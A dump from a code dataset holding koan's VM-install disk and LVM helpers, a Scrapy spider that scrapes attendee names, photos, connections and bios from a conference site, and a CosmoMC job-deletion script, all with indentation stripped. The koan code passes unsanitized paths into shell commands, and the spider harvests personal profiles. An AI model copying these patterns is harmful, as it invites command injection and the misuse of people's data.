creator = xencreate.start_install
if self.virt_type == "xenfv":
fullvirt = True
can_poll = "xen"
elif self.virt_type in [ "qemu", "kvm" ] :
fullvirt = True
uuid = None
import qcreate
creator = qcreate.start_install
can_poll = "qemu"
elif self.virt_type == "vmware":
import vmwcreate
uuid = None
creator = vmwcreate.start_install
elif self.virt_type == "vmwarew":
import vmwwcreate
uuid = None
creator = vmwwcreate.start_install
elif self.virt_type == "openvz":
import openvzcreate
uuid = None
creator = openvzcreate.start_install
else:
raise InfoException, "Unspecified virt type: %s" % self.virt_type
return (uuid, creator, fullvirt, can_poll)
#---------------------------------------------------
def merge_disk_data(self, paths, sizes, drivers):
counter = 0
disks = []
for p in paths:
path = paths[counter]
if counter >= len(sizes):
size = sizes[-1]
else:
size = sizes[counter]
if counter >= len(drivers):
driver = drivers[-1]
else:
driver = drivers[counter]
disks.append([path,size,driver])
counter = counter + 1
if len(disks) == 0:
print "paths: ", paths
print "sizes: ", sizes
print "drivers: ", drivers
raise InfoException, "Disk configuration not resolvable!"
return disks
#---------------------------------------------------
def calc_virt_name(self,profile_data):
if self.virt_name is not None:
# explicit override
name = self.virt_name
elif profile_data.has_key("interfaces"):
# this is a system object, just use the name
name = profile_data["name"]
else:
# just use the time, we used to use the MAC
# but that's not really reliable when there are more
# than one.
name = time.ctime(time.time())
# keep libvirt happy with the names
return name.replace(":","_").replace(" ","_")
#--------------------------------------------------
def calc_virt_autoboot(self,data,override_autoboot=False):
if override_autoboot:
return True
autoboot = self.safe_load(data,'virt_auto_boot',0)
autoboot = str(autoboot).lower()
if autoboot in [ "1", "true", "y", "yes" ]:
return True
return False
#--------------------------------------------------
def calc_virt_filesize(self,data,default_filesize=0):
# MAJOR FIXME: are there overrides?
size = self.safe_load(data,'virt_file_size','xen_file_size',0)
tokens = str(size).split(",")
accum = []
for t in tokens:
accum.append(self.calc_virt_filesize2(data,size=t))
return accum
#---------------------------------------------------
def calc_virt_filesize2(self,data,default_filesize=1,size=0):
"""
Assign a virt filesize if none is given in the profile.
"""
err = False
try:
int(size)
except:
err = True
if size is None or size == '':
err = True
if err:
print "invalid file size specified, using defaults"
return default_filesize
return int(size)
#---------------------------------------------------
def calc_virt_drivers(self,data):
driver = self.safe_load(data,'virt_disk_driver',default='raw')
tokens = driver.split(",")
accum = []
for t in tokens:
# FIXME: this list should be pulled out of
# the virtinst VirtualDisk class, but
# not all versions of virtinst have a
# nice list to use
if t in ('raw','qcow','aio'):
accum.append(t)
else:
print "invalid disk driver specified, defaulting to 'raw'"
accum.append('raw')
return accum
#---------------------------------------------------
def calc_virt_ram(self,data,default_ram=64):
"""
Assign a virt ram size if none is given in the profile.
"""
size = self.safe_load(data,'virt_ram','xen_ram',0)
err = False
try:
int(size)
except:
err = True
if size is None or size == '' or int(size) < default_ram:
err = True
if err:
print "invalid RAM size specified, using defaults."
return default_ram
return int(size)
#---------------------------------------------------
def calc_virt_cpus(self,data,default_cpus=1):
"""
Assign virtual CPUs if none is given in the profile.
"""
size = self.safe_load(data,'virt_cpus',default=default_cpus)
try:
isize = int(size)
except:
traceback.print_exc()
return default_cpus
return isize
#---------------------------------------------------
def calc_virt_mac(self,data):
if not self.is_virt:
return None # irrelevant
if self.is_mac(self.system):
return self.system.upper()
return self.random_mac()
#---------------------------------------------------
def calc_virt_uuid(self,data):
# TODO: eventually we may want to allow some koan CLI
# option (or cobbler system option) for passing in the UUID.
# Until then, it's random.
return None
"""
Assign a UUID if none/invalid is given in the profile.
"""
my_id = self.safe_load(data,'virt_uuid','xen_uuid',0)
uuid_re = re.compile('[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}')
err = False
try:
str(my_id)
except:
err = True
if my_id is None or my_id == '' or not uuid_re.match(id):
err = True
if err and my_id is not None:
print "invalid UUID specified. randomizing..."
return None
return my_id
#----------------------------------------------------
def calc_virt_path(self,pd,name):
# input is either a single item or a string list
# it's not in the arguments to this function .. it's from one of many
# potential sources
location = self.virt_path
if location is None:
# no explicit CLI override, what did the cobbler server say?
location = self.safe_load(pd, 'virt_path', default=None)
if location is None or location == "":
# not set in cobbler either? then assume reasonable defaults
if self.virt_type in [ "xenpv", "xenfv" ]:
prefix = "/var/lib/xen/images/"
elif self.virt_type in [ "qemu", "kvm" ]:
prefix = "/var/lib/libvirt/images/"
elif self.virt_type == "vmwarew":
prefix = "/var/lib/vmware/%s/" % name
else:
prefix = "/var/lib/vmware/images/"
if not os.path.exists(prefix):
print "- creating: %s" % prefix
os.makedirs(prefix)
return [ "%s/%s-disk0" % (prefix, name) ]
# ok, so now we have a user that either through cobbler or some other
# source *did* specify a location. It might be a list.
virt_sizes = self.calc_virt_filesize(pd)
path_splitted = location.split(",")
paths = []
count = -1
for x in path_splitted:
count = count + 1
path = self.calc_virt_path2(pd,name,offset=count,location=x,sizes=virt_sizes)
paths.append(path)
return paths
#---------------------------------------------------
def calc_virt_path2(self,pd,name,offset=0,location=None,sizes=[]):
# Parse the command line to determine if this is a
# path, a partition, or a volume group parameter
# Ex: /foo
# Ex: partition:/dev/foo
# Ex: volume-group:/dev/foo/
# chosing the disk image name (if applicable) is somewhat
# complicated ...
# use default location for the virt type
if not location.startswith("/dev/") and location.startswith("/"):
# filesystem path
if os.path.isdir(location):
return "%s/%s-disk%s" % (location, name, offset)
elif not os.path.exists(location) and os.path.isdir(os.path.dirname(location)):
return location
else:
if self.force_path:
return location
else:
raise InfoException, "The location %s is an existing file. Consider '--force-path' to overwrite it." % location
elif location.startswith("/dev/"):
# partition
if os.path.exists(location):
return location
else:
raise InfoException, "virt path is not a valid block device"
else:
# it's a volume group, verify that it exists
args = "vgs -o vg_name"
print "%s" % args
vgnames = sub_process.Popen(args, shell=True, stdout=sub_process.PIPE).communicate()[0]
print vgnames
if vgnames.find(location) == -1:
raise InfoException, "The volume group [%s] does not exist." % location
# check free space
args = "LANG=C vgs --noheadings -o vg_free --units g %s" % location
print args
cmd = sub_process.Popen(args, stdout=sub_process.PIPE, shell=True)
freespace_str = cmd.communicate()[0]
freespace_str = freespace_str.split("\n")[0].strip()
freespace_str = freespace_str.lower().replace("g","").replace(',', '.') # remove gigabytes
print "(%s)" % freespace_str
freespace = int(float(freespace_str))
virt_size = self.calc_virt_filesize(pd)
if len(virt_size) > offset:
virt_size = sizes[offset]
else:
return sizes[-1]
if freespace >= int(virt_size):
# look for LVM partition named foo, create if doesn't exist
args = "lvs -o lv_name %s" % location
print "%s" % args
lvs_str=sub_process.Popen(args, stdout=sub_process.PIPE, shell=True).communicate()[0]
print lvs_str
name = "%s-disk%s" % (name,offset)
# have to create it?
if lvs_str.find(name) == -1:
args = "lvcreate -L %sG -n %s %s" % (virt_size, name, location)
print "%s" % args
lv_create = sub_process.call(args, shell=True)
if lv_create != 0:
raise InfoException, "LVM creation failed"
# partition location
partition_location = "/dev/mapper/%s-%s" % (location,name.replace('-','--'))
# check whether we have SELinux enabled system
args = "/usr/sbin/selinuxenabled"
selinuxenabled = sub_process.call(args)
if selinuxenabled == 0:
# required context type
context_type = "virt_image_t"
# change security context type to required one
args = "/usr/bin/chcon -t %s %s" % (context_type, partition_location)
print "%s" % args
change_context = sub_process.call(args, close_fds=True, shell=True)
# modify SELinux policy in order to preserve security context
# between reboots
args = "/usr/sbin/semanage fcontext -a -t %s %s" % (context_type, partition_location)
print "%s" % args
change_context |= sub_process.call(args, close_fds=True, shell=True)
if change_context != 0:
raise InfoException, "SELinux security context setting to LVM partition failed"
# return partition location
return partition_location
else:
raise InfoException, "volume group needs %s GB free space." % virt_size
def randomUUID(self):
"""
Generate a random UUID. Copied from xend/uuid.py
"""
rc = []
for x in range(0, 16):
rc.append(random.randint(0,255))
return rc
def uuidToString(self, u):
"""
return uuid as a string
"""
return "-".join(["%02x" * 4, "%02x" * 2, "%02x" * 2, "%02x" * 2,
"%02x" * 6]) % tuple(u)
def get_uuid(self,uuid):
"""
return the passed-in uuid, or a random one if it's not set.
"""
if uuid:
return uuid
return self.uuidToString(self.randomUUID())
if __name__ == "__main__":
main()
|
gpl-2.0
| -3,040,904,404,183,310,000 | 38.412829 | 161 | 0.508103 | false |
Lazar-T/conference-crawler
|
openStack/spiders/openStackSpider.py
|
1
|
2023
|
# -*- coding: utf-8 -*-
import urlparse
from scrapy.http import Request
from scrapy.loader import ItemLoader
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Compose, MapCompose
from w3lib.html import replace_escape_chars, remove_tags
from openStack.items import ItemloadItem
class ItemspiderSpider(CrawlSpider):
name = 'openstack'
allowed_domains = ['openstacksummitnovember2014paris.sched.org']
start_urls = ['http://openstacksummitnovember2014paris.sched.org/directory/attendees/']
rules = (
Rule(LinkExtractor(allow=('/directory/attendees/\d+')),
callback='parse_page', follow=True),)
def parse_page(self, response):
"""Yields all attendee urls.
@url http://openstacksummitnovember2014paris.sched.org/directory/attendees/
@scrapes attendees
"""
attendees = response.xpath('//h2/a/@href').extract()
for attendee in attendees:
yield Request(urlparse.urljoin(response.url, attendee),
callback=self.parse_item)
def parse_item(self, response):
""" Returns fields from each individual attendee.
@url http://openstacksummitnovember2014paris.sched.org/cfb
@scrapes name image_url friends title_company_location links about
"""
l = ItemLoader(item=ItemloadItem(), response=response)
l.default_output_processor = MapCompose(lambda v: v.strip(), replace_escape_chars)
l.add_xpath('name', '//*[@id="sched-page-me-name"]/text()')
l.add_xpath('image_url', '//*[@id="myavatar"]/@src')
l.add_xpath('friends', '//*[@id="sched-page-me-connections"]/ul/li/a/@title')
l.add_xpath('title_company_location', '//*[@id="sched-page-me-profile-data"]/text()')
l.add_xpath('links', '//*[@class="sched-network-link"]/a/@href')
l.add_xpath('about', '//*[@id="sched-page-me-profile-about"]/text()')
return l.load_item()
|
mit
| 6,775,172,230,990,549,000 | 37.903846 | 93 | 0.659911 | false |
ClaudioNahmad/Servicio-Social
|
Parametros/CosmoMC/CosmoMC-master/python/deleteJobs.py
|
1
|
1785
|
from __future__ import absolute_import
from __future__ import print_function
import subprocess
from paramgrid import batchjob_args, jobqueue
Opts = batchjob_args.batchArgs('Delete running or queued jobs', importance=True, batchPathOptional=True)
group = Opts.parser.add_mutually_exclusive_group()
group.add_argument('--queued', action='store_true')
group.add_argument('--running', action='store_true')
Opts.parser.add_argument('--delete_id_min', type=int)
Opts.parser.add_argument('--delete_id_range', nargs=2, type=int)
Opts.parser.add_argument('--delete_ids', nargs='+', type=int)
Opts.parser.add_argument('--confirm', action='store_true')
(batch, args) = Opts.parseForBatch()
if batch:
if args.delete_id_range is not None:
jobqueue.deleteJobs(args.batchPath, jobId_minmax=args.delete_id_range, confirm=args.confirm)
if args.delete_id_min is not None:
jobqueue.deleteJobs(args.batchPath, jobId_min=args.delete_id_min, confirm=args.confirm)
elif args.delete_ids is not None:
jobqueue.deleteJobs(args.batchPath, args.delete_ids, confirm=args.confirm)
else:
items = [jobItem for jobItem in Opts.filteredBatchItems()]
batchNames = set([jobItem.name for jobItem in items])
jobqueue.deleteJobs(args.batchPath, rootNames=batchNames, confirm=args.confirm)
if not args.confirm: print('jobs not actually deleted: add --confirm to really cancel them')
else:
ids = []
if args.delete_id_range is not None: ids = list(range(args.delete_id_range[0], args.delete_id_range[1] + 1))
elif args.delete_ids is not None: ids += args.delete_ids
else: print('Must give --delete_id_range or --delete_ids if no batch directory')
for jobId in ids:
subprocess.check_output('qdel ' + str(jobId), shell=True)
|
gpl-3.0
| -3,567,789,519,922,405,400 | 43.625 | 112 | 0.716527 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.